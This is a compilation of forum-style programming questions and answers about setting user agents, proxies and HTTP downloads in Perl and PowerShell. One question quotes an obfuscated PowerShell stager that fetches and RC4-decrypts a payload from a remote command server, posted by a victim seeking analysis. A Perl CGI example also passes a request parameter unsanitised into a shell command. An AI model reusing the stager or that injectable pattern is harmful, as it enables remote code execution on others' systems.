We have a proxy server here and all internet traffic is going through that. The command: cpan package fails with the following error:
LWP failed with code[403] message[Browserblocked]
I think, only specific browsers are let through the proxy server, so I need to set the useragent for cpan. Where can I set it? I don't see anything similar in o conf.
Rewriting the code of site\lib\LWP\UserAgent.pm
sub _agent { "libwww-perl/$VERSION" }
say to:
sub _agent { 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0' }
solves the problem, but is this really the official solution?
Related
I have added the CurlWget extension for my browser and tried to download data using jupyter notebook as below:
!wget --header="Host: storage.googleapis.com" --header="User-Agent: Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
OPR/66.0.3515.44" --header="Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,
application/signed-exchange;v=b3;q=0.9" --header="Accept-Language: en-US,en;q=0.9" --
header="Referer: https://www.kaggle.com/" "https://storage.googleapis.com/kagglesdsdata/competitions
/4117/46665/train.7z?GoogleAccessId=web-data#kaggle-161607.iam.gserviceaccount.com&Expires=1580049706&Signature=kowWRCMZZkqsrEqcwFtNJd4nwGgpE9DLbAcJ2b%2BvaGw1Wie82k3K03bhmHpqnhIKPsloHQJRq%2FHpBxv4kSeINAymvKvJXcpffjMqx%2Baujazoqxbl0aAQUhBs27OTKTqSp5Hzfhpz%2FKd%2Fx6SuYUCxy7x%2BAFOjlzQ8se59vJPwEmRNr4%2BSeOepC%2F%2BWJYzgLIcXDFy%2BUjjH1SrnBdAgRiMEa8pPD%2FZxmRma4ggWIWskLEVyuq4oAyVnaXK%2F39GsCo5lr199KqsPsO7BYJxs2hGv%2FlY6n4PirdQpw68dsSrLvfnSbpQckVVRtqjb9uLWDsQqarWfec1INAmHwaa%2B2Db2yQ%3D%3D&response-content-disposition=attachment%3B+filename%3Dtrain.7z" -O "train.7z" -c
But i am getting below error:
'wget' is not recognized as an internal or external command, operable program or batch file.
i have installed wget using below command:
pip install wget
This probably not a satisfying answer, but the answer is don't do this. CurlWget was flagged as malware and taken from the chrome web store:
https://chrome.google.com/webstore/detail/curlwget/jmocjfidanebdlinpbcdkcmgdifblncg/support?hl=pt-BR&authuser=2
My question: why does my perl script--successful via home laptop--not work when run in the context of my hosting website? (Perhaps they have a firewall, for example. Perhaps my website needs to provide credentials. Perhaps this is in the realm of cross-site scripting. I DON'T KNOW and appeal for your help in my understanding what could be the cause and then the solution. Thanks!)
Note that all works fine IF I run the perl script from my laptop at home.
But if I upload the perl script to my web host, where I have a web page whose javascript successfully calls that perl script, there is an error back from the site whose URL is in the perl script (finance.yahoo in this example).
To bypass the javascript, I'm just typing the URL of my perl script, e.g. http://example.com/blah/script.pl
Here is the full error message from finance.yahoo when $url starts with http:
Can't connect to finance.yahoo.com:80 nodename nor servname provided, or not known at C:/Perl/lib/LWP/Protocol/http.pm line 47.
Here is the full error message from finance.yahoo when $url starts with https:
Can't connect to finance.yahoo.com:443 nodename nor servname provided, or not known at C:/Perl/lib/LWP/Protocol/http.pm line 47.
Code:
#!/usr/bin/perl
use strict; use warnings;
use LWP 6; # one site suggested loading this "for all important LWP classes"
use HTTP::Request;
### sample of interest: to scrape historical data and feed massaged facts to my private web page via js ajax
my $url = 'http://finance.yahoo.com/quote/sbux/profile?ltr=1';
my $browser = LWP::UserAgent->new;
# one site suggested having this empty cookie jar could help
$browser->cookie_jar({});
# another site suggested I should provide WAGuess
my #ns_headers = (
'User-Agent' =>
# 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Accept' => 'text/html, */*',
'Accept-Charset' => 'iso-8859-1,*,utf-8',
'Accept-Language' => 'en-US',
);
my $response = $browser->get($url, #ns_headers);
# for now, I just want to confirm, in my web page itself, that
# the target web page's contents was returned
my $content = $response->content;
# show such content in my web page
print "Content-type: text/html\n\n" . $content;
Well it is not obvious what is your final goal and it is possible that you over complicate the task.
You can retrieve above mentioned page with simpler perl code
#!/usr/bin/env perl
#
# vim: ai:ts=4:sw=4
#
use strict;
use warnings;
use feature 'say';
use HTTP::Tiny;
my $debug = 1;
my $url = 'https://finance.yahoo.com/quote/sbux/profile?ltr=1';
my $responce = HTTP::Tiny->new->get($url);
if ($responce->{success}) {
my $html = $responce->{content};
say $html if $debug;
}
In your post you indicated that javascript is somehow involved -- it is not clear how and what it's purpose in retrieving of the page.
Error message has a reference to at C:/Perl/lib/LWP/Protocol/http.pm line 47 which indicates that web hosting is taking place on Windows machine -- it would be nice to indicate it in your message.
Could you shed some light on purpose of following block in your code?
# WAGuess
$browser->env_proxy;
# WAGuess
$browser->cookie_jar({});
I do not see cookie_jar be utilized in your code anywhere.
Do you plan to use some authentication approach to extract some data under your personal account which is not accessible otherwise?
Please state in a few first sentences what you try to achieve on grand scale.
Perhaps it's about cookies or about using yahoo's "query" url instead.
Yahoo Finance URL not working
Some please help me to analyse this code.
[SYstem.NEt.SeRVICEPoiNtMAnagEr]::EXPecT100CONtinue=0;$wC=NEW-ObJECt SYsteM.NEt.WebCLiENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$wC.HEADerS.Add('User-Agent',$u);
$wC.PROxY=[SYstem.NEt.WeBReqUest]::DeFaULtWeBPrOxy;
$Wc.PRoXy.CRedEntiALS = [SYSTEM.NET.CReDENTiAlCaCHe]::DEFAULTNETwORkCREdENTIalS;
$Script:Proxy = $wc.Proxy;$K=[SYstem.TeXT.ENcodiNg]::ASCII.GetBYTEs('3c9825ffc1d70f40ec648606c637200d'); $R={$D,$K=$ARGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COunt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]}; $D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOr$S[($S[$I]+$S[$H])%256]}}; $ser='http://colo.myftp.org:4445';$t='/admin/get.php';$wC.HEadeRs.ADD("Cookie","session=R9rR6fhOaMdGNJI1saLgl2JtVSY="); $daTA=$WC.DOWnlOADDATa($SER+$T); $IV=$DATa[0..3];$DaTA=$dATa[4..$dATa.lENGTH];
-JOiN[ChAR[]](& $R $dAta ($IV+$K)) write-host $R
someone tries to access my system,i just extracted some code blocks from there application. Please help me to analyse this code.
I'm having a little problem which looks very simple... but I just don't get it!
I try to download the website content of: http://cspsp.gshi.org/ (if you try to access it via www.cspsp.gshi.org you get to the wrong page....)
For this I do it like that in Powershell:
(New-Object System.Net.WebClient).DownloadFile( 'http://cspsp.gshi.org/', 'save.htm' )
I can acess the website with Firefox and download its contents easily but Powershell always outputs something like that:
The remoteserver returned an Error: (404) Nothing found. (translated from German).
I'm not sure what I'm doing wrong here. Other websites like Google just work fine.
It appears that the site relies on the User-Agent request headers being sent by HTTP clients, and that System.Net.WebClient doesn't send even a default value (at least, it didn't when I hit my own, local servers.)
Either way, this worked for me:
$request = (New-Object System.Net.WebClient)
$request.headers['User-Agent'] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.40 Safari/537.17"
$request.DownloadFile('http://cspsp.gshi.org/', 'saved.html')
I'm trying to output an image from RRD Tool using Perl. I've posted the relevant part of the CGI script below:
sub graph
{
my $rrd_path = $co->param('rrd_path');
my $RRD_DIR = "../data/";
#generate a PNG from the RRD
my $png_filename = "-"; # a '-' as the filename send the PNG to stdout
my $rrd = "$RRD_DIR/$rrd_path";
my $png = `rrdtool graph $png_filename -a PNG -r -l 0 --base 1024 --start -151200 -- vertical-label 'bits per second' --width 500 --height 200 DEF:bytesInPerSec=$rrd:bytesInPerSec:AVERAGE DEF:bytesOutPerSec=$rrd:bytesOutPerSec:AVERAGE CDEF:sbytesInPerSec=bytesInPerSec,8,* CDEF:sbytesOutPerSec=bytesOutPerSec,8,* AREA:sbytesInPerSec#00cf00:AvgIn LINE1:sbytesOutPerSec#002a97:AvgOut VRULE:1246428000#ff0000:`;
#print the image header
use bytes;
print $co->header(-type=>"image/png",-Content_length=>length($png));
binmode STDOUT;
print $png;
}#end graph
This works fine on the command line (perl graph.cgi > test.png) - commenting out the header, of course, as well as on my Ubuntu 10.04 development machine. However, when I move to the Centos 5 production server, it doesn't, and the browser receives a content-length of 0:
Ubuntu 10.04/Apache:
Request URL:http://noc-student.nmsu.edu/grasshopper/web/graph.cgi
Request Method:GET
Status Code:200 OK
Request Headers
Accept:application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Cache-Control:max-age=0
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.36 Safari/534.7
Response Headers
Connection:Keep-Alive
Content-Type:image/png
Content-length:12319
Date:Fri, 08 Oct 2010 21:40:05 GMT
Keep-Alive:timeout=15, max=97
Server:Apache/2.2.14 (Ubuntu)
And from the Centos 5/Apache Server:
Request URL:http://grasshopper-new.nmsu.edu/grasshopper/branches/michael_dev/web/graph.cgi
Request Method:GET
Status Code:200 OK
Request Headers
Accept:application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Cache-Control:max-age=0
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.36 Safari/534.7
Response Headers
Connection:close
Content-Type:image/png
Content-length:0
Date:Fri, 08 Oct 2010 21:40:32 GMT
Server:Apache/2.2.3 (CentOS)
The use bytes and manual setting of the content length are in there to try to fix the problem, but it's the same without them. Same with setting binmode on STDOUT. The script works fine from the command line on both machines.
See my How can I troubleshoot my Perl CGI program. Typically, the difference between running your program on the command line and from the web server is a matter of difference environments. In this case I'd expect that either rddtool is not in the path or the webserver user can't run it.
The backticks only capture standard output. There is probably some standard error output in the web server error log.
Are you sure your web user has access to your data? Try having the CGI writing the png to the filesystem, so you can make sure it's generated properly. If it is, the problem is in the transmission (headers, encodings, etc). If not, it's unrelated to the web server, and probably related to permissions.